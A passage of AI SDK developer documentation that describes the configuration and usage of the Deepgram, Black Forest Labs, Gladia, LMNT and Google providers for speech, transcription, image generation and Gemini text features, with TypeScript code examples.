const result = await generateSpeech({
  model: deepgram.speech('aura-2-helena-en'),
  text: 'Hello, world!',
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram, type DeepgramSpeechModelOptions } from '@ai-sdk/deepgram';

const result = await generateSpeech({
  model: deepgram.speech('aura-2-helena-en'),
  text: 'Hello, world!',
  providerOptions: {
    deepgram: {
      encoding: 'linear16',
      sampleRate: 24000,
    } satisfies DeepgramSpeechModelOptions,
  },
});

The following provider options are available:

encoding string

Encoding type for the audio output. Supported values: 'linear16', 'mulaw', 'alaw', 'mp3', 'opus', 'flac', 'aac'. Optional.
container string

Container format for the output audio. Supported values: 'wav', 'ogg', 'none'. Optional.
sampleRate number

Sample rate for the output audio in Hz. Supported values depend on the encoding: 8000, 16000, 24000, 32000, 48000. Optional.
bitRate number | string

Bitrate of the audio in bits per second. For mp3: 32000 or 48000. For opus: 4000 to 650000. For aac: 4000 to 192000. Optional.
callback string

URL to which Deepgram will make a callback request with the audio. Optional.
callbackMethod enum

HTTP method for the callback request. Allowed values: 'POST', 'PUT'. Optional.
mipOptOut boolean

Opts out requests from the Deepgram Model Improvement Program. Optional.
tag string | array of strings

Label your requests for identification during usage reporting. Optional.

Model Capabilities

Model
`aura-2-asteria-en`
`aura-2-thalia-en`
`aura-2-helena-en`
`aura-2-orpheus-en`
`aura-2-zeus-en`
`aura-asteria-en`
`aura-luna-en`
`aura-stella-en`
+ more voices

Transcription Models

You can create models that call the Deepgram transcription API using the .transcription() factory method.

The first argument is the model id e.g. nova-3.

const model = deepgram.transcription('nova-3');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import {
  deepgram,
  type DeepgramTranscriptionModelOptions,
} from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    deepgram: {
      summarize: true,
    } satisfies DeepgramTranscriptionModelOptions,
  },
});

The following provider options are available:

language string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
detectLanguage boolean

Whether to enable automatic language detection. When true, Deepgram will detect the language of the audio. Optional.
smartFormat boolean

Whether to apply smart formatting to the transcription. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
summarize enum | boolean

Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
topics boolean

Whether to detect topics in the transcription. Optional.
detectEntities boolean

Whether to detect entities in the transcription. Optional.
redact string | array of strings

Specifies what content to redact from the transcription. Optional.
search string

Search term to find in the transcription. Optional.
diarize boolean

Whether to identify different speakers in the transcription. Defaults to true. Optional.
utterances boolean

Whether to segment the transcription into utterances. Optional.
uttSplit number

Threshold for splitting utterances. Optional.
fillerWords boolean

Whether to include filler words (um, uh, etc.) in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`nova-3` (+ variants)
`nova-2` (+ variants)
`nova` (+ variants)
`enhanced` (+ variants)
`base` (+ variants)

title: Black Forest Labs description: Learn how to use Black Forest Labs models with the AI SDK.

Black Forest Labs Provider

Setup

The Black Forest Labs provider is available via the @ai-sdk/black-forest-labs module. You can install it with

Provider Instance

You can import the default provider instance blackForestLabs from @ai-sdk/black-forest-labs:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';

If you need a customized setup, you can import createBlackForestLabs and create a provider instance with your settings:

import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';

const blackForestLabs = createBlackForestLabs({
  apiKey: 'your-api-key', // optional, defaults to BFL_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Black Forest Labs provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use a regional endpoint. The default prefix is https://api.bfl.ai/v1.
apiKey string

API key that is being sent using the x-key header. It defaults to the BFL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
pollIntervalMillis number

Interval in milliseconds between polling attempts when waiting for image generation to complete. Defaults to 500ms.
pollTimeoutMillis number

Overall timeout in milliseconds for polling before giving up. Defaults to 60000ms (60 seconds).

Image Models

You can create Black Forest Labs image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { writeFileSync } from 'node:fs';
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Model Capabilities

Black Forest Labs offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Black Forest Labs Models Page.

Model	Description
`flux-kontext-pro`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations
`flux-kontext-max`	FLUX.1 Kontext [max] with improved prompt adherence and typography generation
`flux-pro-1.1-ultra`	Ultra-fast, ultra high-resolution image creation
`flux-pro-1.1`	Fast, high-quality image generation from text.
`flux-pro-1.0-fill`	Inpainting model for filling masked regions of images with new content

Black Forest Labs models support aspect ratios from 3:7 (portrait) to 7:3 (landscape).

Image Editing

Black Forest Labs Kontext models support powerful image editing capabilities using reference images. Pass input images via prompt.images to transform, combine, or edit existing images.

Single Image Editing

Transform an existing image using text prompts:

import {
  blackForestLabs,
  BlackForestLabsImageModelOptions,
} from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: blackForestLabs.image('flux-kontext-pro'),
  prompt: {
    text: 'A baby elephant with a shirt that has the logo from the input image.',
    images: [
      'https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png',
    ],
  },
  providerOptions: {
    blackForestLabs: {
      width: 1024,
      height: 768,
    } satisfies BlackForestLabsImageModelOptions,
  },
});

Multi-Reference Editing

Combine multiple reference images for complex transformations. Black Forest Labs supports up to 10 input images:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: blackForestLabs.image('flux-kontext-pro'),
  prompt: {
    text: 'Combine the style of image 1 with the subject of image 2',
    images: [
      'https://example.com/style-reference.jpg',
      'https://example.com/subject-reference.jpg',
    ],
  },
});

Inpainting

The flux-pro-1.0-fill model supports inpainting, which allows you to fill masked regions of an image with new content. Pass the source image via prompt.images and a mask image via prompt.mask:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.0-fill'),
  prompt: {
    text: 'A beautiful garden with flowers',
    images: ['https://example.com/source-image.jpg'],
    mask: 'https://example.com/mask-image.png',
  },
});

The mask image should be a grayscale image where white areas indicate regions to be filled and black areas indicate regions to preserve.

Provider Options

Black Forest Labs image models support flexible provider options through the providerOptions.blackForestLabs object. The supported parameters depend on the used model ID:

width number - Output width in pixels (256–1920). When set, this overrides any width derived from size.
height number - Output height in pixels (256–1920). When set, this overrides any height derived from size.
outputFormat string - Desired format of the output image ("jpeg" or "png").
steps number - Number of inference steps. Higher values may improve quality but increase generation time.
guidance number - Guidance scale for generation. Higher values follow the prompt more closely.
imagePrompt string - Base64-encoded image to use as additional visual context for generation.
imagePromptStrength number - Strength of the image prompt influence on generation (0.0 to 1.0).
promptUpsampling boolean - If true, performs upsampling on the prompt.
raw boolean - Enable raw mode for more natural, authentic aesthetics.
safetyTolerance number - Moderation level for inputs and outputs (0 = most strict, 6 = more permissive).
pollIntervalMillis number - Interval in milliseconds between polling attempts (default 500ms).
pollTimeoutMillis number - Overall timeout in milliseconds for polling before timing out (default 60s).
webhookUrl string - URL for asynchronous completion notification. Must be a valid HTTP/HTTPS URL.
webhookSecret string - Secret for webhook signature verification, sent in the X-Webhook-Secret header.

Provider Metadata

The generateImage response includes provider-specific metadata in providerMetadata.blackForestLabs.images[]. Each image object may contain the following properties:

seed number - The seed used for generation. Useful for reproducing results.
start_time number - Unix timestamp when generation started.
end_time number - Unix timestamp when generation completed.
duration number - Generation duration in seconds.
cost number - Cost of the generation request.
inputMegapixels number - Input image size in megapixels.
outputMegapixels number - Output image size in megapixels.

import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
});

// Access provider metadata
const metadata = providerMetadata?.blackForestLabs?.images?.[0];
console.log('Seed:', metadata?.seed);
console.log('Cost:', metadata?.cost);
console.log('Duration:', metadata?.duration);

Regional Endpoints

By default, requests are sent to https://api.bfl.ai/v1. You can select a regional endpoint by setting baseURL when creating the provider instance:

import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';

const blackForestLabs = createBlackForestLabs({
  baseURL: 'https://api.eu.bfl.ai/v1', // or https://api.us.bfl.ai/v1
});

title: Gladia description: Learn how to use the Gladia provider for the AI SDK.

Gladia Provider

The Gladia provider contains language model support for the Gladia transcription API.

Setup

The Gladia provider is available in the @ai-sdk/gladia module. You can install it with

Provider Instance

You can import the default provider instance gladia from @ai-sdk/gladia:

import { gladia } from '@ai-sdk/gladia';

If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:

import { createGladia } from '@ai-sdk/gladia';

const gladia = createGladia({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Gladia provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the GLADIA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Gladia transcription API using the .transcription() factory method.

const model = gladia.transcription();

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { type GladiaTranscriptionModelOptions } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    gladia: {
      summarization: true,
    } satisfies GladiaTranscriptionModelOptions,
  },
});

The following provider options are available:

contextPrompt string

Context to feed the transcription model with for possible better accuracy. Optional.
customVocabulary boolean | any[]

Custom vocabulary to improve transcription accuracy. Optional.
customVocabularyConfig object

Configuration for custom vocabulary. Optional.
- vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
- defaultIntensity number
detectLanguage boolean

Whether to automatically detect the language. Optional.
enableCodeSwitching boolean

Enable code switching for multilingual audio. Optional.
codeSwitchingConfig object

Configuration for code switching. Optional.
- languages string[]
language string

Specify the language of the audio. Optional.
callback boolean

Enable callback when transcription is complete. Optional.
callbackConfig object

Configuration for callback. Optional.
- url string
- method 'POST' | 'PUT'
subtitles boolean

Generate subtitles from the transcription. Optional.
subtitlesConfig object

Configuration for subtitles. Optional.
- formats Array<'srt' | 'vtt'>
- minimumDuration number
- maximumDuration number
- maximumCharactersPerRow number
- maximumRowsPerCaption number
- style 'default' | 'compliance'
diarization boolean

Enable speaker diarization. Optional.
diarizationConfig object

Configuration for diarization. Optional.
- numberOfSpeakers number
- minSpeakers number
- maxSpeakers number
- enhanced boolean
translation boolean

Enable translation of the transcription. Optional.
translationConfig object

Configuration for translation. Optional.
- targetLanguages string[]
- model 'base' | 'enhanced'
- matchOriginalUtterances boolean
summarization boolean

Enable summarization of the transcription. Optional.
summarizationConfig object

Configuration for summarization. Optional.
- type 'general' | 'bullet_points' | 'concise'
moderation boolean

Enable content moderation. Optional.
namedEntityRecognition boolean

Enable named entity recognition. Optional.
chapterization boolean

Enable chapterization of the transcription. Optional.
nameConsistency boolean

Enable name consistency in the transcription. Optional.
customSpelling boolean

Enable custom spelling. Optional.
customSpellingConfig object

Configuration for custom spelling. Optional.
- spellingDictionary Record<string, string[]>
structuredDataExtraction boolean

Enable structured data extraction. Optional.
structuredDataExtractionConfig object

Configuration for structured data extraction. Optional.
- classes string[]
sentimentAnalysis boolean

Enable sentiment analysis. Optional.
audioToLlm boolean

Enable audio to LLM processing. Optional.
audioToLlmConfig object

Configuration for audio to LLM. Optional.
- prompts string[]
customMetadata Record<string, any>

Custom metadata to include with the request. Optional.
sentences boolean

Enable sentence detection. Optional.
displayMode boolean

Enable display mode. Optional.
punctuationEnhanced boolean

Enable enhanced punctuation. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`Default`

title: LMNT description: Learn how to use the LMNT provider for the AI SDK.

LMNT Provider

The LMNT provider contains speech model support for the LMNT speech synthesis API.

Setup

The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with

Provider Instance

You can import the default provider instance lmnt from @ai-sdk/lmnt:

import { lmnt } from '@ai-sdk/lmnt';

If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:

import { createLMNT } from '@ai-sdk/lmnt';

const lmnt = createLMNT({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the LMNT provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the LMNT speech API using the .speech() factory method.

The first argument is the model id e.g. aurora.

const model = lmnt.speech('aurora');

The voice parameter can be set to a voice ID from LMNT. You can find available voices in the LMNT documentation.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  voice: 'ava',
  language: 'en',
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
import { type LMNTSpeechModelOptions } from '@ai-sdk/lmnt';

const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  voice: 'ava',
  language: 'en',
  providerOptions: {
    lmnt: {
      conversational: true,
      speed: 1.2,
    } satisfies LMNTSpeechModelOptions,
  },
});

Provider Options

The LMNT provider accepts the following options via providerOptions.lmnt:

format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav'

The audio format to return. Defaults to 'mp3'.
sampleRate 8000 | 16000 | 24000

The sample rate of the audio in Hz. Defaults to 24000.
speed number

The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
seed number

An optional seed for deterministic generation.
conversational boolean

Whether to use a conversational style. Defaults to false. Does not work with the blizzard model.
length number

Maximum length of the audio in seconds. Maximum value is 300. Does not work with the blizzard model.
topP number

Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
temperature number

Temperature parameter for sampling. Must be at least 0. Defaults to 1.

Model Capabilities

Model	Instructions
`aurora`
`blizzard`

title: Google description: Learn how to use Google Provider.

Google Provider

The Google provider contains language and embedding model support for the Google APIs.

Setup

The Google provider is available in the @ai-sdk/google module. You can install it with

Provider Instance

You can import the default provider instance google from @ai-sdk/google:

import { google } from '@ai-sdk/google';

If you need a customized setup, you can import createGoogle from @ai-sdk/google and create a provider instance with your settings:

import { createGoogle } from '@ai-sdk/google';

const google = createGoogle({
  // custom settings
});

You can use the following optional settings to customize the Google provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
apiKey string

API key that is being sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
generateId () => string

Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.
name string

Custom provider name. Defaults to 'google.generative-ai'.

Language Models

const model = google('gemini-2.5-flash');

You can use Google language models to generate text with the generateText function:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Google also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';

const model = google('gemini-2.5-flash');

await generateText({
  model,
  providerOptions: {
    google: {
      safetySettings: [
        {
          category: 'HARM_CATEGORY_UNSPECIFIED',
          threshold: 'BLOCK_LOW_AND_ABOVE',
        },
      ],
    } satisfies GoogleLanguageModelOptions,
  },
});

The following optional provider options are available for Google models:

cachedContent string

Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_UNSPECIFIED
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
  - HARM_CATEGORY_CIVIC_INTEGRITY
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
  - OFF
responseModalities string[] The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text.
thinkingConfig { thinkingLevel?: 'minimal' | 'low' | 'medium' | 'high'; thinkingBudget?: number; includeThoughts?: boolean }

Optional. Configuration for the model's thinking process. Only supported by specific Google models.
- thinkingLevel 'minimal' | 'low' | 'medium' | 'high'
  
  Optional. Controls the thinking depth for Gemini 3 models. Gemini 3.1 Pro supports 'low', 'medium', and 'high', Gemini 3 Pro supports 'low' and 'high', while Gemini 3 Flash supports all four levels: 'minimal', 'low', 'medium', and 'high'. Only supported by Gemini 3 models.
- thinkingBudget number
  
  Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Setting it to 0 disables thinking, if the model supports it. For more information about the possible value ranges for each model see Google thinking documentation.
- includeThoughts boolean
  
  Optional. If set to true, thought summaries are returned, which are synthesized versions of the model's raw thoughts and offer insights into the model's internal reasoning process.
imageConfig { aspectRatio?: string, imageSize?: string }

Optional. Configuration for the models image generation. Only supported by specific Google models.
- aspectRatio string
  
  Model defaults to generate 1:1 squares, or to matching the output image size to that of your input image. Can be one of the following:
  - 1:1
  - 2:3
  - 3:2
  - 3:4
  - 4:3
  - 4:5
  - 5:4
  - 9:16
  - 16:9
  - 21:9
- imageSize string
  
  Controls the output image resolution. Defaults to 1K. Can be one of the following:
  - 1K
  - 2K
  - 4K
audioTimestamp boolean

Optional. Enables timestamp understanding for audio-only files. See Google Cloud audio understanding documentation.
mediaResolution string

Optional. If specified, the media resolution specified will be used. Can be one of the following:
- MEDIA_RESOLUTION_UNSPECIFIED
- MEDIA_RESOLUTION_LOW
- MEDIA_RESOLUTION_MEDIUM
- MEDIA_RESOLUTION_HIGH
See Google API MediaResolution documentation.
labels Record<string, string>

Optional. Defines labels used in billing reports. Available on Vertex AI only. See Google Cloud labels documentation.
serviceTier 'standard' | 'flex' | 'priority'

Optional. The service tier to use for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency. Set to 'priority' for ultra-low latency at a 75-100% price premium over 'standard'.
threshold string

Optional. Standalone threshold setting that can be used independently of safetySettings. Uses the same values as the safetySettings threshold.

Thinking

Gemini 3 Models

For Gemini 3 models, use the thinkingLevel parameter to control the depth of reasoning:

import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const model = google('gemini-3.1-pro-preview');

const { text, reasoning } = await generateText({
  model: model,
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingLevel: 'high',
        includeThoughts: true,
      },
    } satisfies GoogleLanguageModelOptions,
  },
});

console.log(text);

console.log(reasoning); // Reasoning summary

Gemini 2.5 Models

For Gemini 2.5 models, use the thinkingBudget parameter to control the number of thinking tokens:

import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const model = google('gemini-2.5-flash');

const { text, reasoning } = await generateText({
  model: model,
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingBudget: 8192,
        includeThoughts: true,
      },
    } satisfies GoogleLanguageModelOptions,
  },
});

console.log(text);

console.log(reasoning); // Reasoning summary

File Inputs

The Google provider supports file inputs, e.g. PDF files.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

You can also use YouTube URLs directly:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Summarize this video',
        },
        {
          type: 'file',
          data: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
          mediaType: 'video/mp4',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Cached Content

Google supports both explicit and implicit caching to help reduce costs on repetitive content.

Implicit Caching

To maximize cache hits with implicit caching:

Keep content at the beginning of requests consistent
Add variable content (like user questions) at the end of prompts
Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

// Structure prompts with consistent content at the beginning
const baseContext =
  'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';

const { text: veggieLasagna } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});

// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});

// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.google);
// e.g.
// {
//   groundingMetadata: null,
//   safetyRatings: null,
//   usageMetadata: {
//     cachedContentTokenCount: 2027,
//     thoughtsTokenCount: 702,
//     promptTokenCount: 2152,
//     candidatesTokenCount: 710,
//     totalTokenCount: 3564
//   }
// }

Explicit Caching

For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models. See the models page to check if caching is supported for the used model:

import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { GoogleGenAI } from '@google/genai';
import { generateText } from 'ai';

const ai = new GoogleGenAI({
  apiKey: process.env.GOOGLE_GENERATIVE_AI_API_KEY,
});

const model = 'gemini-2.5-pro';

// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
  model,
  config: {
    contents: [
      {
        role: 'user',
        parts: [{ text: '1000 Lasagna Recipes...' }],
      },
    ],
    ttl: '300s', // Cache expires after 5 minutes
  },
});

const { text: veggieLasagnaRecipe } = await generateText({
  model: google(model),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    google: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

const { text: meatLasagnaRecipe } = await generateText({
  model: google(model),
  prompt: 'Write a meat lasagna recipe for 12 people.',
  providerOptions: {
    google: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

Code Execution

With Code Execution, certain models can generate and execute Python code to perform calculations, solve problems, or provide more accurate information.

You can enable code execution by adding the code_execution tool to your request.

import { google } from '@ai-sdk/google';
import { googleTools } from '@ai-sdk/google/internal';
import { generateText } from 'ai';

const { text, toolCalls, toolResults } = await generateText({
  model: google('gemini-2.5-pro'),
  tools: { code_execution: google.tools.codeExecution({}) },
  prompt: 'Use python to calculate the 20th fibonacci number.',
});

The response will contain the tool calls and results from the code execution.

Google Search

With Google Search grounding, the model has access to the latest information using Google Search.

import { google } from '@ai-sdk/google';
import { GoogleProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

The googleSearch tool accepts the following optional configuration options:

searchTypes object

Enables specific search types. Both can be combined.
- webSearch: Enable web search grounding (pass {} to enable). This is the default.
- imageSearch: Enable image search grounding (pass {} to enable).
timeRangeFilter object

Restricts search results to a specific time range. Both startTime and endTime are required.
- startTime: Start time in ISO 8601 format (e.g. '2025-01-01T00:00:00Z').
- endTime: End time in ISO 8601 format (e.g. '2025-12-31T23:59:59Z').

google.tools.googleSearch({
  searchTypes: { webSearch: {} },
  timeRangeFilter: {
    startTime: '2025-01-01T00:00:00Z',
    endTime: '2025-12-31T23:59:59Z',
  },
});

When Google Search grounding is enabled, the model will include sources in the response.

Additionally, the grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:

webSearchQueries (string[] | null)
- Array of search queries used to retrieve information
- Example: ["What's the weather in Chicago this weekend?"]
searchEntryPoint ({ renderedContent: string } | null)
- Contains the main search result content used as an entry point
- The renderedContent field contains the formatted content
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by search results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting search result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "webSearchQueries": ["What's the weather in Chicago this weekend?"],
    "searchEntryPoint": {
      "renderedContent": "..."
    },
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 65,
          "text": "Chicago weather changes rapidly, so layers let you adjust easily."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.99]
      }
    ]
  }
}

Enterprise Web Search

With Enterprise Web Search, the model has access to a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and public sector.

import { createVertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
});

const { text, sources, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
  },
  prompt: 'What are the latest regulatory updates for financial services?',
});

Enterprise Web Search provides the following benefits:

Does not log customer data
Supports VPC service controls
Compliance-focused web index for regulated industries

File Search

The File Search tool lets Gemini retrieve context from your own documents that you have indexed in File Search stores. Only Gemini 2.5 and Gemini 3 models support this feature.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: google('gemini-2.5-pro'),
  tools: {
    file_search: google.tools.fileSearch({
      fileSearchStoreNames: [
        'projects/my-project/locations/us/fileSearchStores/my-store',
      ],
      metadataFilter: 'author = "Robert Graves"',
      topK: 8,
    }),
  },
  prompt: "Summarise the key themes of 'I, Claudius'.",
});

File Search responses include citations via the normal sources field and expose raw grounding metadata in providerMetadata.google.groundingMetadata.

URL Context

Google provides a provider-defined URL context tool.

The URL context tool allows you to provide specific URLs that you want the model to analyze directly in from the prompt.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: `Based on the document: https://ai.google.dev/gemini-api/docs/url-context.
          Answer this question: How many links we can consume in one request?`,
  tools: {
    url_context: google.tools.urlContext({}),
  },
});

const metadata = providerMetadata?.google as
  | GoogleProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;

The URL context metadata includes detailed information about how the model used the URL context to generate the response. Here are the available fields:

urlMetadata ({ retrievedUrl: string; urlRetrievalStatus: string; }[] | null)
- Array of URL context metadata
- Each object includes:
  - retrievedUrl: The URL of the context
  - urlRetrievalStatus: The status of the URL retrieval

Example response:

{
  "urlMetadata": [
    {
      "retrievedUrl": "https://ai-sdk.dev/providers/ai-sdk-providers/google",
      "urlRetrievalStatus": "URL_RETRIEVAL_STATUS_SUCCESS"
    }
  ]
}

With the URL context tool, you will also get the groundingMetadata.

"groundingMetadata": {
    "groundingChunks": [
        {
            "web": {
                "uri": "https://ai-sdk.dev/providers/ai-sdk-providers/google",
                "title": "Google - AI SDK Providers"
            }
        }
    ],
    "groundingSupports": [
        {
            "segment": {
                "startIndex": 67,
